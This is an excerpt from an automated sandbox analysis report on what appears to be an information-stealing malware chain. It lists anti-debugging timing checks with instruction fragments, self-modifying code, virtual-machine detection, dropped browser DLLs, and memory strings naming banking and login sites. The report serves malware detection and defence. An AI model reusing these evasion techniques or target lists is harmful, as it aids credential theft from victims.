                      Source: C:\Users\user\DocumentsKJEGCFBGDH.exeRDTSC instruction interceptor: First address: BB25AE second address: BB25BE instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 je 00007F49A854EE96h 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                      Source: C:\Users\user\DocumentsKJEGCFBGDH.exeRDTSC instruction interceptor: First address: BB25BE second address: BB25D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F49A8F2A337h 0x00000009 rdtsc
                      Source: C:\Users\user\DocumentsKJEGCFBGDH.exeRDTSC instruction interceptor: First address: BB25D9 second address: BB25E9 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f pop edi 0x00000010 rdtsc
                      Source: C:\Users\user\DocumentsKJEGCFBGDH.exeRDTSC instruction interceptor: First address: BB275F second address: BB2765 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                      Source: C:\Users\user\DocumentsKJEGCFBGDH.exeRDTSC instruction interceptor: First address: BB2B83 second address: BB2B8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                      Source: C:\Users\user\DocumentsKJEGCFBGDH.exeRDTSC instruction interceptor: First address: BB2B8B second address: BB2B98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 je 00007F49A8F2A326h 0x0000000d rdtsc
                      Source: C:\Users\user\DocumentsKJEGCFBGDH.exeRDTSC instruction interceptor: First address: BB2B98 second address: BB2BC3 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F49A854EE96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jg 00007F49A854EE9Ch 0x00000010 pushad 0x00000011 jmp 00007F49A854EEA2h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                      Source: C:\Users\user\DocumentsKJEGCFBGDH.exeRDTSC instruction interceptor: First address: BB2BC3 second address: BB2BF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jbe 00007F49A8F2A328h 0x0000000e push edx 0x0000000f pop edx 0x00000010 pushad 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 push edx 0x00000014 pop edx 0x00000015 jmp 00007F49A8F2A336h 0x0000001a pushad 0x0000001b popad 0x0000001c popad 0x0000001d rdtsc
                      Source: C:\Users\user\DocumentsKJEGCFBGDH.exeRDTSC instruction interceptor: First address: BB2BF1 second address: BB2BFB instructions: 0x00000000 rdtsc 0x00000002 jo 00007F49A854EE9Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                      Source: C:\Users\user\DocumentsKJEGCFBGDH.exeRDTSC instruction interceptor: First address: BB2D42 second address: BB2D7D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F49A8F2A337h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F49A8F2A338h 0x00000010 jc 00007F49A8F2A326h 0x00000016 rdtsc
                      Tries to evade debugger and weak emulator (self modifying code)
                      Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: DEFA09 instructions caused by: Self-modifying code
                      Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: DEFAB4 instructions caused by: Self-modifying code
                      Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: F8DBFA instructions caused by: Self-modifying code
                      Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: F8C76D instructions caused by: Self-modifying code
                      Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: F9EE7E instructions caused by: Self-modifying code
                      Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 101DE18 instructions caused by: Self-modifying code
                      Source: C:\Users\user\DocumentsKJEGCFBGDH.exeSpecial instruction interceptor: First address: 9FEA58 instructions caused by: Self-modifying code
                      Source: C:\Users\user\DocumentsKJEGCFBGDH.exeSpecial instruction interceptor: First address: BAB91A instructions caused by: Self-modifying code
                      Source: C:\Users\user\DocumentsKJEGCFBGDH.exeSpecial instruction interceptor: First address: BBDADF instructions caused by: Self-modifying code
                      Source: C:\Users\user\DocumentsKJEGCFBGDH.exeSpecial instruction interceptor: First address: C43564 instructions caused by: Self-modifying code
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: 4CEA58 instructions caused by: Self-modifying code
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: 67B91A instructions caused by: Self-modifying code
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: 68DADF instructions caused by: Self-modifying code
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: 713564 instructions caused by: Self-modifying code
                      Source: C:\Users\user\AppData\Local\Temp\1007634001\824db60d2b.exeSpecial instruction interceptor: First address: 16A4947 instructions caused by: Self-modifying code
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeSpecial instruction interceptor: First address: 3DBEF6 instructions caused by: Self-modifying code
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeSpecial instruction interceptor: First address: 3BB7C2 instructions caused by: Self-modifying code
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeSpecial instruction interceptor: First address: 43D60C instructions caused by: Self-modifying code
                      Source: C:\Users\user\AppData\Local\Temp\1007636001\241fdb96f6.exeSpecial instruction interceptor: First address: 108FA09 instructions caused by: Self-modifying code
                      Source: C:\Users\user\AppData\Local\Temp\1007636001\241fdb96f6.exeSpecial instruction interceptor: First address: 108FAB4 instructions caused by: Self-modifying code
                      Source: C:\Users\user\AppData\Local\Temp\1007636001\241fdb96f6.exeSpecial instruction interceptor: First address: 122DBFA instructions caused by: Self-modifying code
                      Source: C:\Users\user\AppData\Local\Temp\1007636001\241fdb96f6.exeSpecial instruction interceptor: First address: 122C76D instructions caused by: Self-modifying code
                      Source: C:\Users\user\AppData\Local\Temp\1007636001\241fdb96f6.exeSpecial instruction interceptor: First address: 123EE7E instructions caused by: Self-modifying code
                      Source: C:\Users\user\AppData\Local\Temp\1007636001\241fdb96f6.exeSpecial instruction interceptor: First address: 12BDE18 instructions caused by: Self-modifying code
                      Source: C:\Users\user\AppData\Local\Temp\1007638001\fb696bafb5.exeSpecial instruction interceptor: First address: 59DC16 instructions caused by: Self-modifying code
                      Source: C:\Users\user\AppData\Local\Temp\1007638001\fb696bafb5.exeSpecial instruction interceptor: First address: 73D0B4 instructions caused by: Self-modifying code
                      Source: C:\Users\user\AppData\Local\Temp\1007638001\fb696bafb5.exeSpecial instruction interceptor: First address: 73B91C instructions caused by: Self-modifying code
                      Source: C:\Users\user\AppData\Local\Temp\1007638001\fb696bafb5.exeSpecial instruction interceptor: First address: 7C5E57 instructions caused by: Self-modifying code
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeSpecial instruction interceptor: First address: 5BCDC16 instructions caused by: Self-modifying code
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeSpecial instruction interceptor: First address: 5D6D0B4 instructions caused by: Self-modifying code
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeSpecial instruction interceptor: First address: 5D6B91C instructions caused by: Self-modifying code
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeSpecial instruction interceptor: First address: 5DF5E57 instructions caused by: Self-modifying code
                      Source: C:\Users\user\AppData\Local\Temp\1007638001\fb696bafb5.exeMemory allocated: 4AF0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\1007638001\fb696bafb5.exeMemory allocated: 4D60000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\1007638001\fb696bafb5.exeMemory allocated: 4AF0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\1007636001\241fdb96f6.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                      Source: C:\Users\user\AppData\Local\Temp\1007636001\241fdb96f6.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                      Source: C:\Users\user\AppData\Local\Temp\1007636001\241fdb96f6.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                      Source: C:\Users\user\DocumentsKJEGCFBGDH.exeCode function: 21_2_053D0B67 rdtsc 21_2_053D0B67
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread delayed: delay time: 180000
                      Source: C:\Users\user\AppData\Local\Temp\1007638001\fb696bafb5.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow / User API: threadDelayed 8651
                      Source: C:\Users\user\AppData\Local\Temp\1007634001\824db60d2b.exeWindow / User API: threadDelayed 4009
                      Source: C:\Users\user\AppData\Local\Temp\1007637001\846d486827.exeWindow / User API: threadDelayed 500
                      Source: C:\Users\user\Desktop\file.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\freebl3[1].dllJump to dropped file
                      Source: C:\Users\user\Desktop\file.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\softokn3[1].dllJump to dropped file
                      Source: C:\Users\user\Desktop\file.exeDropped PE file which has not been started: C:\ProgramData\nss3.dllJump to dropped file
                      Source: C:\Users\user\Desktop\file.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\msvcp140[1].dllJump to dropped file
                      Source: C:\Users\user\Desktop\file.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\mozglue[1].dllJump to dropped file
                      Source: C:\Users\user\Desktop\file.exeDropped PE file which has not been started: C:\ProgramData\freebl3.dllJump to dropped file
                      Source: C:\Users\user\Desktop\file.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\nss3[1].dllJump to dropped file
                      Source: C:\Users\user\Desktop\file.exeDropped PE file which has not been started: C:\ProgramData\softokn3.dllJump to dropped file
                      Source: C:\Users\user\Desktop\file.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\vcruntime140[1].dllJump to dropped file
                      Source: C:\Users\user\Desktop\file.exeAPI coverage: 0.8 %
                      Source: C:\Users\user\Desktop\file.exe TID: 3048Thread sleep time: -36018s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\file.exe TID: 6524Thread sleep time: -32016s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4072Thread sleep count: 81 > 30
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4072Thread sleep time: -162081s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6928Thread sleep count: 82 > 30
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6928Thread sleep time: -164082s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2820Thread sleep count: 75 > 30
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2820Thread sleep time: -150075s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4864Thread sleep count: 265 > 30
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4864Thread sleep time: -7950000s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3300Thread sleep count: 68 > 30
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3300Thread sleep time: -136068s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3472Thread sleep count: 8651 > 30
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3472Thread sleep time: -17310651s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4784Thread sleep time: -180000s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5308Thread sleep count: 64 > 30
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5308Thread sleep time: -128064s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\1007634001\824db60d2b.exe TID: 8952Thread sleep count: 98 > 30
                      Source: C:\Users\user\AppData\Local\Temp\1007634001\824db60d2b.exe TID: 8952Thread sleep time: -196098s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\1007634001\824db60d2b.exe TID: 8928Thread sleep count: 92 > 30
                      Source: C:\Users\user\AppData\Local\Temp\1007634001\824db60d2b.exe TID: 8928Thread sleep time: -184092s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\1007634001\824db60d2b.exe TID: 9028Thread sleep time: -40000s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\1007634001\824db60d2b.exe TID: 5160Thread sleep count: 91 > 30
                      Source: C:\Users\user\AppData\Local\Temp\1007634001\824db60d2b.exe TID: 5160Thread sleep time: -182091s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\1007634001\824db60d2b.exe TID: 8948Thread sleep count: 4009 > 30
                      Source: C:\Users\user\AppData\Local\Temp\1007634001\824db60d2b.exe TID: 8948Thread sleep time: -8022009s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exe TID: 9108Thread sleep time: -40020s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exe TID: 9096Thread sleep time: -52026s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exe TID: 9088Thread sleep time: -36018s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exe TID: 9068Thread sleep time: -36018s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exe TID: 9160Thread sleep time: -240000s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exe TID: 9044Thread sleep time: -48024s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exe TID: 9076Thread sleep time: -44022s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exe TID: 616Thread sleep time: -48024s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exe TID: 8048Thread sleep time: -38019s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exe TID: 7768Thread sleep time: -40020s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exe TID: 3880Thread sleep time: -36000s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exe TID: 4180Thread sleep time: -210000s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exe TID: 7596Thread sleep time: -42021s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exe TID: 5980Thread sleep time: -42021s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exe TID: 5772Thread sleep time: -54027s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\1007638001\fb696bafb5.exe TID: 2476Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Users\user\DocumentsKJEGCFBGDH.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C97C930 GetSystemInfo,VirtualAlloc,GetSystemInfo,VirtualFree,VirtualAlloc,0_2_6C97C930
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread delayed: delay time: 30000
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread delayed: delay time: 180000
                      Source: C:\Users\user\AppData\Local\Temp\1007638001\fb696bafb5.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                      Source: file.exe, file.exe, 00000000.00000002.2588649124.0000000000F6C000.00000040.00000001.01000000.00000003.sdmp, DocumentsKJEGCFBGDH.exe, DocumentsKJEGCFBGDH.exe, 00000015.00000002.2653120074.0000000000B8D000.00000040.00000001.01000000.0000000B.sdmp, skotes.exe, skotes.exe, 00000017.00000002.2743970653.000000000065D000.00000040.00000001.01000000.0000000E.sdmp, 241fdb96f6.exe, 0000001A.00000002.2939102064.000000000120C000.00000040.00000001.01000000.00000011.sdmp, fb696bafb5.exe, 00000028.00000002.3148239056.000000000071E000.00000040.00000001.01000000.00000013.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                      Source: 8eeb449c35.exe, 00000021.00000003.3063514988.0000000005AB0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
                      Source: 8eeb449c35.exe, 00000021.00000003.3063514988.0000000005AB0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
                      Source: 8eeb449c35.exe, 00000021.00000003.3063514988.0000000005AB0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
                      Source: 8eeb449c35.exe, 00000021.00000003.3063514988.0000000005AB0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696487552f
                      Source: DocumentsKJEGCFBGDH.exe, 00000015.00000003.2624366882.00000000016DA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: 8eeb449c35.exe, 00000021.00000003.3063514988.0000000005AB0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696487552x
                      Source: 241fdb96f6.exe, 0000001A.00000002.2940433964.0000000001A1E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMwarey
                      Source: 8eeb449c35.exe, 00000021.00000003.3063514988.0000000005AB0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
                      Source: file.exe, 00000000.00000002.2589542776.0000000001885000.00000004.00000020.00020000.00000000.sdmp, 241fdb96f6.exe, 0000001A.00000002.2940433964.0000000001A64000.00000004.00000020.00020000.00000000.sdmp, 241fdb96f6.exe, 0000001A.00000002.2940433964.0000000001A93000.00000004.00000020.00020000.00000000.sdmp, 8eeb449c35.exe, 00000021.00000003.3277455938.000000000117F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: 8eeb449c35.exe, 00000021.00000003.3063514988.0000000005AB0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696487552
                      Source: firefox.exe, 0000002B.00000002.3167049287.0000023763EC7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002D.00000002.3149134395.000001C080020000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW : 2 : 34 : 1 : 1 : 0x20026 : 0x8 : %SystemRoot%\system32\mswsock.dll : : 1234191b-4bf7-4ca7-86e0-dfd7c32b5445
                      Source: file.exe, 00000000.00000002.2589542776.0000000001855000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWh
                      Source: 8eeb449c35.exe, 00000021.00000003.3063514988.0000000005AB0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
                      Source: 8eeb449c35.exe, 00000021.00000003.3063514988.0000000005AB0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
                      Source: 8eeb449c35.exe, 00000021.00000003.3063514988.0000000005AB0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696487552
                      Source: 8eeb449c35.exe, 00000021.00000003.3063514988.0000000005AB0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696487552o
                      Source: 8eeb449c35.exe, 00000021.00000003.3063514988.0000000005AB5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696487552p
                      Source: 8eeb449c35.exe, 00000021.00000003.3063514988.0000000005AB0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696487552
                      Source: 8eeb449c35.exe, 00000021.00000003.3063514988.0000000005AB0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
                      Source: file.exe, 00000000.00000002.2614337983.0000000023BD1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1RECOVE~1470bankoRecoveryImprovedVMware20,11696487552x
                      Source: 8eeb449c35.exe, 00000021.00000003.3063514988.0000000005AB0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696487552
                      Source: 8eeb449c35.exe, 00000021.00000003.3063514988.0000000005AB0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696487552j
                      Source: 8eeb449c35.exe, 00000021.00000003.3063514988.0000000005AB0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
                      Source: 8eeb449c35.exe, 00000021.00000003.3063514988.0000000005AB0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
                      Source: file.exe, 00000000.00000002.2614337983.0000000023BD1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware20,11696487552x
                      Source: DocumentsKJEGCFBGDH.exe, 00000015.00000003.2624366882.00000000016DA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\B
                      Source: 8eeb449c35.exe, 00000021.00000003.3063514988.0000000005AB0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
                      Source: 8eeb449c35.exe, 00000021.00000003.3063514988.0000000005AB0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
                      Source: 8eeb449c35.exe, 00000021.00000003.3063514988.0000000005AB0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
                      Source: 8eeb449c35.exe, 00000021.00000003.3172396760.0000000005A77000.00000004.00000800.00020000.00000000.sdmp, 8eeb449c35.exe, 00000021.00000003.3173952757.0000000005A77000.00000004.00000800.00020000.00000000.sdmp, 8eeb449c35.exe, 00000021.00000003.3113747993.0000000005A77000.00000004.00000800.00020000.00000000.sdmp, 8eeb449c35.exe, 00000021.00000003.3139638775.0000000005A77000.00000004.00000800.00020000.00000000.sdmp, 8eeb449c35.exe, 00000021.00000003.3077350241.0000000005A6B000.00000004.00000800.00020000.00000000.sdmp, 8eeb449c35.exe, 00000021.00000003.3101243619.0000000005A77000.00000004.00000800.00020000.00000000.sdmp, 8eeb449c35.exe, 00000021.00000003.3062222043.0000000005A6B000.00000004.00000800.00020000.00000000.sdmp, 8eeb449c35.exe, 00000021.00000003.3252465546.0000000005A77000.00000004.00000800.00020000.00000000.sdmp, 8eeb449c35.exe, 00000021.00000003.3081632661.0000000005A74000.00000004.00000800.00020000.00000000.sdmp, 8eeb449c35.exe, 00000021.00000003.3260290230.0000000005A61000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: n29TtmTfWbTJ0IYJkyXVZTogEvk0Ug/cTvdVBjxCPm0bNBY/sA3VxFhkhdzQsFcLBz6uGXB1DV0nbobJw9jhNYa0gG/En+48ZFhmCFIXmuZoqiopbM5c3YRODtzXlizVX/mAitADqNeW5oaJtWpjpinGWLCK8urG3jKNN0mmupGvcU5HlXybvdFUXWgqEhdpkMfvjkkaEbCSfMYSxkL4HWyoXAB1G5hDlqeMuUnwoUAFmVChtHrzZUuj
                      Source: 8eeb449c35.exe, 00000021.00000003.3063514988.0000000005AB0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
                      Source: 8eeb449c35.exe, 00000021.00000003.3063514988.0000000005AB0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696487552t
                      Source: 8eeb449c35.exe, 00000021.00000003.3063514988.0000000005AB0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
                      Source: 241fdb96f6.exe, 0000001A.00000002.2940433964.0000000001A1E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                      Source: 8eeb449c35.exe, 00000021.00000003.3063514988.0000000005AB0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
                      Source: 8eeb449c35.exe, 00000021.00000003.3063514988.0000000005AB0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
                      Source: DocumentsKJEGCFBGDH.exe, 00000015.00000003.2624366882.00000000016DA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
                      Source: 8eeb449c35.exe, 00000021.00000003.3063514988.0000000005AB0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696487552s
                      Source: 8eeb449c35.exe, 00000021.00000003.3063514988.0000000005AB0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
                      Source: 8eeb449c35.exe, 00000021.00000003.3063514988.0000000005AB0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696487552t
